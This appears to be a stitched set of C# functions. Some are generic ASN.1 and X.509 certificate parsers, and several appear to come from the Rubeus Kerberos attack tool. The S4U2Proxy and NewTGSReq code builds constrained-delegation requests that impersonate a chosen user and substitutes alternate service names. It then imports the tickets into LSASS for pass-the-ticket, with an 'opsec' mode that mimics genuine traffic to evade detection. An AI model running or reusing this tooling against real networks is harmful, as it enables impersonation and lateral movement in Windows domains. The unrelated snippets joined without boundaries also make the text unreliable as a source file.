static AsnElt Duplicate(AsnElt ae)
{
if (ae.Constructed)
{
int n = ae.Sub.Length;
AsnElt[] ss = new AsnElt[n];
for (int i = 0; i < n; i++)
{
ss[i] = Duplicate(ae.Sub[i]);
}
return(AsnElt.Make(ae.TagClass, ae.TagValue, ss));
}
if (ae.TagClass == AsnElt.UNIVERSAL)
{
switch (ae.TagValue)
{
case AsnElt.BOOLEAN:
return(ae.GetBoolean()
? AsnElt.BOOL_TRUE : AsnElt.BOOL_FALSE);
case AsnElt.INTEGER:
return(AsnElt.MakeIntegerSigned(
ae.CopyValue()));
case AsnElt.OBJECT_IDENTIFIER:
return(AsnElt.MakeOID(ae.GetOID()));
case AsnElt.NumericString:
case AsnElt.PrintableString:
case AsnElt.IA5String:
case AsnElt.TeletexString:
case AsnElt.UTF8String:
case AsnElt.BMPString:
case AsnElt.UniversalString:
case AsnElt.UTCTime:
case AsnElt.GeneralizedTime:
return(AsnElt.MakeString(
ae.TagValue, ae.GetString()));
}
}
/*
* All other primitive types will be treated as blobs.
* We still need to duplicate them in order to avoid
* variants in tag/length encoding.
*/
return(AsnElt.MakePrimitive(ae.TagClass,
ae.TagValue, ae.CopyValue()));
}
static int GetRSAPublicKeySize(byte[] kv)
{
AsnElt ae = AsnElt.Decode(kv);
ae.CheckTag(AsnElt.SEQUENCE);
ae.CheckNumSub(2);
AsnElt ai = ae.GetSub(0);
ai.CheckTag(AsnElt.INTEGER);
ai.CheckPrimitive();
byte[] v = ai.CopyValue();
if (v.Length > 0 && v[0] >= 0x80)
{
throw new AsnException(
"Invalid RSA modulus (negative)");
}
int bitLen = M.BitLength(v);
if (bitLen < 512)
{
throw new AsnException(string.Format(
"Invalid RSA modulus ({0} bits)", bitLen));
}
else if ((v[v.Length - 1] & 0x01) == 0)
{
throw new AsnException("Invalid RSA modulus (even)");
}
return(bitLen);
}
public PA_S4U_X509_USER(byte[] key, string name, string realm, uint nonce, Interop.KERB_ETYPE eType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
user_id = new S4UUserID(name, realm, nonce);
AsnElt userIDAsn = user_id.Encode();
AsnElt userIDSeq = AsnElt.Make(AsnElt.SEQUENCE, userIDAsn);
byte[] userIDBytes = userIDSeq.CopyValue();
byte[] cksumBytes = null;
if (eType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
cksumBytes = Crypto.KerberosChecksum(key, userIDBytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES256, Interop.KRB_KEY_USAGE_PA_S4U_X509_USER);
}
if (eType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1)
{
cksumBytes = Crypto.KerberosChecksum(key, userIDBytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES128, Interop.KRB_KEY_USAGE_PA_S4U_X509_USER);
}
if (eType == Interop.KERB_ETYPE.rc4_hmac)
{
cksumBytes = Crypto.KerberosChecksum(key, userIDBytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_RSA_MD4, Interop.KRB_KEY_USAGE_PA_S4U_X509_USER);
}
cksum = new Checksum(Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES256, cksumBytes);
}
public PA_S4U_X509_USER(byte[] key, string name, string realm, uint nonce)
{
user_id = new S4UUserID(name, realm, nonce);
AsnElt userIDAsn = user_id.Encode();
AsnElt userIDSeq = AsnElt.Make(AsnElt.SEQUENCE, userIDAsn);
//userIDSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, userIDSeq);
byte[] userIDBytes = userIDSeq.CopyValue();
byte[] cksumBytes = Crypto.KerberosChecksum(key, userIDBytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES256_X509);
cksum = new Checksum(Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES256, cksumBytes);
}
static byte[] GetPositiveInteger(AsnElt ae)
{
ae.CheckTag(AsnElt.INTEGER);
byte[] x = ae.CopyValue();
if (x.Length == 0)
{
throw new AsnException("Invalid integer (empty)");
}
if (x[0] >= 0x80)
{
throw new AsnException("Invalid integer (negative)");
}
return(x);
}
private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", KRB_CRED tgs = null, bool opsec = false, string proxyUrl = null, string createnetonly = null, bool show = false)
{
Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
if (!String.IsNullOrEmpty(altService))
{
string[] altSnames = altService.Split(',');
if (altSnames.Length == 1)
{
Console.WriteLine("[*] Final ticket will be for the alternate service '{0}'", altService);
}
else
{
Console.WriteLine("[*] Final tickets will be for the alternate services '{0}'", altService);
}
}
// extract out the info needed for the TGS-REQ/S4U2Proxy execution
string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
string domain = kirbi.enc_part.ticket_info[0].prealm;
Ticket ticket = kirbi.tickets[0];
byte[] clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
Interop.KERB_ETYPE etype = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;
Console.WriteLine("[*] Building S4U2proxy request for service: '{0}'", targetSPN);
TGS_REQ s4u2proxyReq = new TGS_REQ(!opsec);
s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION;
s4u2proxyReq.req_body.realm = domain;
string[] parts = targetSPN.Split('/');
string serverName = parts[parts.Length - 1];
s4u2proxyReq.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
foreach (string part in parts)
{
s4u2proxyReq.req_body.sname.name_string.Add(part);
}
// supported encryption types
s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.aes128_cts_hmac_sha1);
s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.aes256_cts_hmac_sha1);
s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac);
// add in the ticket from the S4U2self response
s4u2proxyReq.req_body.additional_tickets.Add(tgs.tickets[0]);
// needed for authenticator checksum
byte[] cksum_Bytes = null;
// the rest of the opsec changes
if (opsec)
{
// remove renewableok and add canonicalize
s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
// 15 minutes in the future like genuine requests
DateTime till = DateTime.Now;
till = till.AddMinutes(15);
s4u2proxyReq.req_body.till = till;
// extra etypes
s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac_exp);
s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.old_exp);
// get hostname and hostname of SPN
string hostName = Dns.GetHostName().ToUpper();
string targetHostName;
if (parts.Length > 1)
{
targetHostName = parts[1].Substring(0, parts[1].IndexOf('.')).ToUpper();
}
else
{
targetHostName = hostName;
}
// create enc-authorization-data if target host is not the local machine
if (hostName != targetHostName)
{
// authdata requires key and etype from tgs
byte[] tgsKey = tgs.enc_part.ticket_info[0].key.keyvalue;
Interop.KERB_ETYPE tgsEtype = (Interop.KERB_ETYPE)tgs.enc_part.ticket_info[0].key.keytype;
ADIfRelevant ifrelevant = new ADIfRelevant();
ADRestrictionEntry restrictions = new ADRestrictionEntry();
ADKerbLocal kerbLocal = new ADKerbLocal();
ifrelevant.ADData.Add(restrictions);
ifrelevant.ADData.Add(kerbLocal);
AsnElt authDataSeq = ifrelevant.Encode();
authDataSeq = AsnElt.Make(AsnElt.SEQUENCE, authDataSeq);
byte[] authorizationDataBytes = authDataSeq.Encode();
byte[] enc_authorization_data = Crypto.KerberosEncrypt(tgsEtype, Interop.KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA, tgsKey, authorizationDataBytes);
s4u2proxyReq.req_body.enc_authorization_data = new EncryptedData((Int32)tgsEtype, enc_authorization_data);
}
// encode req_body for authenticator cksum
AsnElt req_Body_ASN = s4u2proxyReq.req_body.Encode();
AsnElt req_Body_ASNSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { req_Body_ASN });
req_Body_ASNSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, req_Body_ASNSeq);
byte[] req_Body_Bytes = req_Body_ASNSeq.CopyValue();
cksum_Bytes = Crypto.KerberosChecksum(clientKey, req_Body_Bytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_RSA_MD5);
}
// moved to end so we can have the checksum in the authenticator
PA_DATA padata = new PA_DATA(domain, userName, ticket, clientKey, etype, opsec, cksum_Bytes);
s4u2proxyReq.padata.Add(padata);
PA_DATA pac_options = new PA_DATA(false, false, false, true);
s4u2proxyReq.padata.Add(pac_options);
byte[] s4ubytes = s4u2proxyReq.Encode().Encode();
byte[] response2 = null;
if (String.IsNullOrEmpty(proxyUrl))
{
string dcIP = Networking.GetDCIP(domainController);
if (String.IsNullOrEmpty(dcIP))
{
return;
}
Console.WriteLine("[*] Sending S4U2proxy request to domain controller {0}:88", dcIP);
response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
}
else
{
Console.WriteLine("[*] Sending S4U2proxy request via KDC proxy: {0}", proxyUrl);
KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(s4ubytes);
message.target_domain = domain;
response2 = Networking.MakeProxyRequest(proxyUrl, message);
}
if (response2 == null)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response2, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
{
Console.WriteLine("[+] S4U2proxy success!");
// parse the response to an TGS-REP
TGS_REP rep2 = new TGS_REP(responseAsn);
// https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
byte[] outBytes2 = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
AsnElt ae2 = AsnElt.Decode(outBytes2, false);
EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);
if (!String.IsNullOrEmpty(altService))
{
string[] altSnames = altService.Split(',');
foreach (string altSname in altSnames)
{
// now build the final KRB-CRED structure with one or more alternate snames
KRB_CRED cred = new KRB_CRED();
// since we want an alternate sname, first substitute it into the ticket structure
rep2.ticket.sname.name_string[0] = altSname;
// add the ticket
cred.tickets.Add(rep2.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart2.key.keytype;
info.key.keyvalue = encRepPart2.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart2.realm;
// [2] pname (user)
info.pname.name_type = rep2.cname.name_type;
info.pname.name_string = rep2.cname.name_string;
// [3] flags
info.flags = encRepPart2.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart2.starttime;
// [6] endtime
info.endtime = encRepPart2.endtime;
// [7] renew-till
info.renew_till = encRepPart2.renew_till;
// [8] srealm
info.srealm = encRepPart2.realm;
// [9] sname
info.sname.name_type = encRepPart2.sname.name_type;
info.sname.name_string = encRepPart2.sname.name_string;
// if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
Console.WriteLine("[*] Substituting alternative service name '{0}'", altSname);
info.sname.name_string[0] = altSname;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}/{1}':\r\n", altSname, serverName);
if (Rubeus.Program.wrapTickets)
{
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else
{
Console.WriteLine(" {0}", kirbiString);
}
if (!String.IsNullOrEmpty(outfile))
{
string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{altSname}-{serverName}{Helpers.GetExtensionFromFilename(outfile)}";
filename = Helpers.MakeValidFileName(filename);
if (Helpers.WriteBytesToFile(filename, kirbiBytes))
{
Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);
}
}
if (ptt)
{
// pass-the-ticket -> import into LSASS
ImportTicket(kirbiBytes, createnetonly, show);
}
}
}
else
{
// now build the final KRB-CRED structure, no alternate snames
KRB_CRED cred = new KRB_CRED();
// if we want an alternate sname, first substitute it into the ticket structure
if (!String.IsNullOrEmpty(altService))
{
rep2.ticket.sname.name_string[0] = altService;
}
// add the ticket
cred.tickets.Add(rep2.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart2.key.keytype;
info.key.keyvalue = encRepPart2.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart2.realm;
// [2] pname (user)
info.pname.name_type = rep2.cname.name_type;
info.pname.name_string = rep2.cname.name_string;
// [3] flags
info.flags = encRepPart2.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart2.starttime;
// [6] endtime
info.endtime = encRepPart2.endtime;
// [7] renew-till
info.renew_till = encRepPart2.renew_till;
// [8] srealm
info.srealm = encRepPart2.realm;
// [9] sname
info.sname.name_type = encRepPart2.sname.name_type;
info.sname.name_string = encRepPart2.sname.name_string;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);
if (Rubeus.Program.wrapTickets)
{
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else
{
Console.WriteLine(" {0}", kirbiString);
}
if (!String.IsNullOrEmpty(outfile))
{
string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{targetSPN}{Helpers.GetExtensionFromFilename(outfile)}";
filename = Helpers.MakeValidFileName(filename);
if (Helpers.WriteBytesToFile(filename, kirbiBytes))
{
Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);
}
}
if (ptt)
{
// pass-the-ticket -> import into LSASS
ImportTicket(kirbiBytes, createnetonly, show);
}
}
}
else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
/*
* Create an instance by decoding the provided object.
* This constructor assumes ASN.1 DER encoding (not Base64,
* not PEM).
*
* On decoding error, an AsnException is thrown.
*/
public X509Cert(byte[] cert)
{
/*
* Compute thumbprint.
*/
thumbprint = M.DoSHA1(cert).ToUpperInvariant();
/*
* Outer layer decoding and extraction of the signature
* hash algorithm.
*/
AsnElt ac = AsnElt.Decode(cert);
ac.CheckTag(AsnElt.SEQUENCE);
ac.CheckNumSub(3);
hashAlgorithm = GetSignHashName(
new AlgorithmIdentifier(ac.GetSub(1)));
/*
* TBS exploration. First field is optional; if present,
* it contains the certificate version.
*/
AsnElt atbs = ac.GetSub(0);
atbs.CheckNumSubMin(6);
atbs.CheckNumSubMax(10);
int off = 0;
if (atbs.GetSub(0).TagValue == 0)
{
off++;
}
/*
* Serial numer: nominally an INTEGER, we extract the
* raw bytes, because some CA wrongly use unsigned
* encoding.
*/
AsnElt aserial = atbs.GetSub(off);
aserial.CheckTag(AsnElt.INTEGER);
byte[] sv = aserial.CopyValue();
int svk = 0;
while (svk < sv.Length && sv[svk] == 0)
{
svk++;
}
if (svk == sv.Length)
{
serialHex = "00";
}
else
{
StringBuilder sb = new StringBuilder();
while (svk < sv.Length)
{
sb.AppendFormat("{0:X2}", sv[svk++]);
}
serialHex = sb.ToString();
}
/*
* Issuer and subject DN.
*/
issuerDN = new X500Name(atbs.GetSub(off + 2));
subjectDN = new X500Name(atbs.GetSub(off + 4));
/*
* Validity dates.
*/
AsnElt adates = atbs.GetSub(off + 3);
adates.CheckTag(AsnElt.SEQUENCE);
adates.CheckNumSub(2);
validFrom = adates.GetSub(0).GetTime();
validTo = adates.GetSub(1).GetTime();
/*
* Public key.
*/
AsnElt aspki = atbs.GetSub(off + 5);
aspki.CheckTag(AsnElt.SEQUENCE);
aspki.CheckNumSub(2);
AlgorithmIdentifier kt =
new AlgorithmIdentifier(aspki.GetSub(0));
AsnElt aktp = kt.Parameters;
AsnElt apkv = aspki.GetSub(1);
apkv.CheckTag(AsnElt.BIT_STRING);
byte[] kv = apkv.GetBitString();
curveOID = null;
keyType = "UNKNOWN";
keySize = 0;
switch (kt.OID)
{
/*
* RSA public keys should use the 'rsaEncryption' OID,
* but some are tagged with the OAEP or the PSS OID,
* to somehow specify that the RSA key should be used
* only with OAEP or PSS.
*/
case "1.2.840.113549.1.1.1":
case "1.2.840.113549.1.1.7":
case "1.2.840.113549.1.1.10":
keyType = "RSA";
keySize = GetRSAPublicKeySize(kv);
break;
/*
* All DSA public keys should use that OID.
*/
case "1.2.840.10040.4.1":
keyType = "DSA";
keySize = GetDSAPublicKeySize(aktp);
break;
/*
* Elliptic curve keys.
* We only support "normal" elliptic curve keys, not
* restricted keys.
* We only supported named curves (RFC 5480 forbids
* explicit curve parameters).
*/
case "1.2.840.10045.2.1":
if (aktp == null)
{
break;
}
if (aktp.TagClass != AsnElt.UNIVERSAL ||
aktp.TagValue != AsnElt.OBJECT_IDENTIFIER)
{
break;
}
keyType = "EC";
curveOID = aktp.GetOID();
keySize = GetCurveSize(curveOID);
break;
/* TODO: GOST R 34.10-94 and GOST R 34.10-2001 */
}
/*
* If there are extensions, process them.
* extract the dNSNames.
*/
serverNames = null;
extensions = new SortedDictionary <string, Extension>(
StringComparer.Ordinal);
for (int i = off + 6; i < atbs.Sub.Length; i++)
{
AsnElt aexts = atbs.GetSub(i);
if (aexts.TagClass != AsnElt.CONTEXT ||
aexts.TagValue != 3)
{
continue;
}
aexts.CheckNumSub(1);
aexts = aexts.GetSub(0);
aexts.CheckTag(AsnElt.SEQUENCE);
foreach (AsnElt aext in aexts.Sub)
{
aext.CheckTag(AsnElt.SEQUENCE);
aext.CheckNumSubMin(2);
aext.CheckNumSubMax(3);
AsnElt aoid = aext.GetSub(0);
aoid.CheckTag(AsnElt.OBJECT_IDENTIFIER);
string oid = aoid.GetOID();
AsnElt av;
bool critical = false;
if (aext.Sub.Length == 2)
{
av = aext.GetSub(1);
}
else
{
AsnElt acrit = aext.GetSub(1);
acrit.CheckTag(AsnElt.BOOLEAN);
critical = acrit.GetBoolean();
av = aext.GetSub(2);
}
av.CheckTag(AsnElt.OCTET_STRING);
Extension ext = new Extension(
oid, critical, av.CopyValue());
if (extensions.ContainsKey(oid))
{
throw new AsnException(
"duplicate extension " + oid);
}
extensions[oid] = ext;
ProcessExtension(ext);
}
}
/*
* If there was no SAN, or no dNSName in the SAN, then
* get the Common Name from the subjectDN.
*/
string cn = null;
foreach (DNPart dnp in subjectDN.Parts)
{
if (dnp.FriendlyType == DNPart.COMMON_NAME)
{
if (cn != null)
{
throw new AsnException(
"multiple CN in subject DN");
}
cn = dnp.Value;
}
}
if (serverNames == null)
{
if (cn == null)
{
serverNames = new string[0];
}
else
{
serverNames = new string[] { cn };
}
}
}
public static byte[] NewTGSReq(string userName, string domain, string sname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, bool renew = false, string s4uUser = "", bool enterprise = false, bool roast = false, bool opsec = false, bool unconstrained = false)
{
TGS_REQ req = new TGS_REQ(!opsec);
if (!opsec)
{
// set the username
req.req_body.cname.name_string.Add(userName);
}
// get domain from service for cross domain requests
// if not requesting a cross domain TGT (krbtgt)
string targetDomain = "";
string[] parts = sname.Split('/');
if (!(roast) && (parts.Length > 1) && (parts[0] != "krbtgt"))
{
targetDomain = parts[1].Substring(parts[1].IndexOf('.') + 1);
}
else
{
targetDomain = domain;
}
// the realm (domain) the user exists in
req.req_body.realm = targetDomain.ToUpper();
// add in our encryption types
if (requestEType == Interop.KERB_ETYPE.subkey_keymaterial)
{
// normal behavior
req.req_body.etypes.Add(Interop.KERB_ETYPE.aes256_cts_hmac_sha1);
req.req_body.etypes.Add(Interop.KERB_ETYPE.aes128_cts_hmac_sha1);
req.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac);
req.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac_exp);
//req.req_body.etypes.Add(Interop.KERB_ETYPE.des_cbc_crc);
}
// real traffic have these etypes except when requesting a TGT, then only
else if ((opsec) && (parts.Length > 1) && (parts[0] != "krbtgt"))
{
req.req_body.etypes.Add(Interop.KERB_ETYPE.aes256_cts_hmac_sha1);
req.req_body.etypes.Add(Interop.KERB_ETYPE.aes128_cts_hmac_sha1);
req.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac);
req.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac_exp);
req.req_body.etypes.Add(Interop.KERB_ETYPE.old_exp);
}
else
{
// add in the supported etype specified
req.req_body.etypes.Add(requestEType);
}
if (!String.IsNullOrEmpty(s4uUser))
{
// constrained delegation yo'
req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_PRINCIPAL;
req.req_body.sname.name_string.Add(userName);
if (!opsec)
{
req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.ENCTKTINSKEY;
}
if (opsec)
{
req.req_body.etypes.Add(Interop.KERB_ETYPE.old_exp);
}
}
else
{
if (enterprise)
{
// KRB_NT-ENTERPRISE = 10
// userPrincipalName
// sAMAccountName
// sAMAccountName@DomainNetBIOSName
// sAMAccountName@DomainFQDN
// DomainNetBIOSName\sAMAccountName
// DomainFQDN\sAMAccountName
req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_ENTERPRISE;
req.req_body.sname.name_string.Add(sname);
req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
}
else if (parts.Length == 1)
{
// KRB_NT_SRV_INST = 2
// service and other unique instance (e.g. krbtgt)
req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
req.req_body.sname.name_string.Add(sname);
req.req_body.sname.name_string.Add(domain);
}
else if (parts.Length == 2)
{
// KRB_NT_SRV_INST = 2
// SPN (sname/server.domain.com)
req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
req.req_body.sname.name_string.Add(parts[0]);
req.req_body.sname.name_string.Add(parts[1]);
}
else if (parts.Length == 3)
{
// KRB_NT_SRV_HST = 3
// SPN (sname/server.domain.com/blah)
req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_HST;
req.req_body.sname.name_string.Add(parts[0]);
req.req_body.sname.name_string.Add(parts[1]);
req.req_body.sname.name_string.Add(parts[2]);
}
else
{
Console.WriteLine("[X] Error: invalid TGS_REQ sname '{0}'", sname);
}
}
if (renew)
{
req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.RENEW;
}
// needed for authenticator checksum
byte[] cksum_Bytes = null;
// opsec complete the request body before the creation of the AP-REQ
if (opsec)
{
// set correct flags based on type of request
req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
if (!unconstrained)
{
req.req_body.kdcOptions = req.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
}
if (unconstrained)
{
req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.FORWARDED;
}
// get hostname and hostname of SPN
string hostName = Dns.GetHostName().ToUpper();
string targetHostName;
if (parts.Length > 1)
{
targetHostName = parts[1].Substring(0, parts[1].IndexOf('.')).ToUpper();
}
else
{
targetHostName = hostName;
}
// create enc-authorization-data if target host is not the local machine
if ((hostName != targetHostName) && String.IsNullOrEmpty(s4uUser) && (!unconstrained))
{
List <AuthorizationData> tmp = new List <AuthorizationData>();
AuthorizationData restrictions = new AuthorizationData(Interop.AuthorizationDataType.KERB_AUTH_DATA_TOKEN_RESTRICTIONS);
AuthorizationData kerbLocal = new AuthorizationData(Interop.AuthorizationDataType.KERB_LOCAL);
tmp.Add(restrictions);
tmp.Add(kerbLocal);
AuthorizationData authorizationData = new AuthorizationData(tmp);
byte[] authorizationDataBytes = authorizationData.Encode().Encode();
byte[] enc_authorization_data = Crypto.KerberosEncrypt(requestEType, Interop.KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA, clientKey, authorizationDataBytes);
req.req_body.enc_authorization_data = new EncryptedData((Int32)requestEType, enc_authorization_data);
}
// S4U requests have a till time of 15 minutes in the future
if (!String.IsNullOrEmpty(s4uUser))
{
DateTime till = DateTime.Now;
till = till.AddMinutes(15);
req.req_body.till = till;
}
// encode req_body for authenticator cksum
AsnElt req_Body_ASN = req.req_body.Encode();
AsnElt req_Body_ASNSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { req_Body_ASN });
req_Body_ASNSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, req_Body_ASNSeq);
byte[] req_Body_Bytes = req_Body_ASNSeq.CopyValue();
cksum_Bytes = Crypto.KerberosChecksum(clientKey, req_Body_Bytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_RSA_MD5);
}
// create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
PA_DATA padata = new PA_DATA(domain, userName, providedTicket, clientKey, paEType, opsec, cksum_Bytes);
req.padata.Add(padata);
// moved so all PA-DATA sections are inserted after the request body has been completed, this is useful when
// forming opsec requests as they require a checksum of the request body within the authenticator and the
// PADATA-TGS-REQ should go before the other PA-DATA sections
if (opsec && (!String.IsNullOrEmpty(s4uUser)))
{
// real packets seem to lowercase the domain in these 2 PA_DATA's
domain = domain.ToLower();
// PA_S4U_X509_USER commented out until we get the checksum working
//PA_DATA s4upadata = new PA_DATA(clientKey, s4uUser, domain, req.req_body.nonce);
//req.padata.Add(s4upadata);
}
// add final S4U PA-DATA
if (!String.IsNullOrEmpty(s4uUser))
{
// constrained delegation yo'
PA_DATA s4upadata = new PA_DATA(clientKey, s4uUser, domain);
req.padata.Add(s4upadata);
}
else if (opsec)
{
PA_DATA padataoptions = new PA_DATA(false, true, false, false);
req.padata.Add(padataoptions);
}
return(req.Encode().Encode());
}
static void Parse(TextWriter tw, int depth, AsnElt ae)
{
Indent(tw, depth);
tw.Write("(");
switch (ae.TagClass)
{
case AsnElt.APPLICATION:
tw.Write("[application " + ae.TagValue + "]");
break;
case AsnElt.CONTEXT:
tw.Write("[" + ae.TagValue + "]");
break;
case AsnElt.PRIVATE:
tw.Write("[private " + ae.TagValue + "]");
break;
default:
switch (ae.TagValue)
{
case AsnElt.BOOLEAN:
tw.Write("bool " + ae.GetBoolean() + ")");
return;
case AsnElt.INTEGER:
tw.Write("int " + ae.GetIntegerHex() + ")");
return;
case AsnElt.BIT_STRING:
int bitLen;
byte[] bs = ae.GetBitString(out bitLen);
tw.Write("bits "
+ (bs.Length * 8 - bitLen));
PrintBytes(tw, depth, bs);
tw.Write(")");
return;
case AsnElt.OCTET_STRING:
tw.Write("blob");
PrintBytes(tw, depth, ae.CopyValue());
tw.Write(")");
return;
case AsnElt.NULL:
ae.CheckNull();
tw.Write("null)");
return;
case AsnElt.OBJECT_IDENTIFIER:
string oid = ae.GetOID();
if (!numOID)
{
oid = AsnOID.ToName(oid);
}
tw.Write("oid " + oid + ")");
return;
case AsnElt.NumericString:
tw.Write("numeric "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.PrintableString:
tw.Write("printable "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.IA5String:
tw.Write("ia5 "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.TeletexString:
tw.Write("teletex "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.UTF8String:
tw.Write("utf8 "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.BMPString:
tw.Write("bmp "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.UniversalString:
tw.Write("utf32 "
+ EscapeString(ae.GetString()) + ")");
return;
case AsnElt.UTCTime:
tw.Write("utc "
+ EscapeString(ae.GetString())
+ " {" + ae.GetTime() + "} )");
return;
case AsnElt.GeneralizedTime:
tw.Write("gentime "
+ EscapeString(ae.GetString())
+ " {" + ae.GetTime() + "} )");
return;
case AsnElt.SEQUENCE:
if (!ae.Constructed)
{
throw new AsnException(
"Non-constructed SEQUENCE");
}
tw.Write("sequence");
ParseSubs(tw, depth, ae);
tw.Write(")");
return;
case AsnElt.SET:
if (!ae.Constructed)
{
throw new AsnException(
"Non-constructed SET");
}
tw.Write("set");
ParseSubs(tw, depth, ae);
tw.Write(")");
return;
default:
tw.Write(
"[universal " + ae.TagValue + "]");
break;
}
break;
}
if (ae.Constructed)
{
tw.Write("sequence");
ParseSubs(tw, depth, ae);
tw.Write(")");
}
else
{
tw.Write("blob");
PrintBytes(tw, depth, ae.CopyValue());
tw.Write(")");
}
}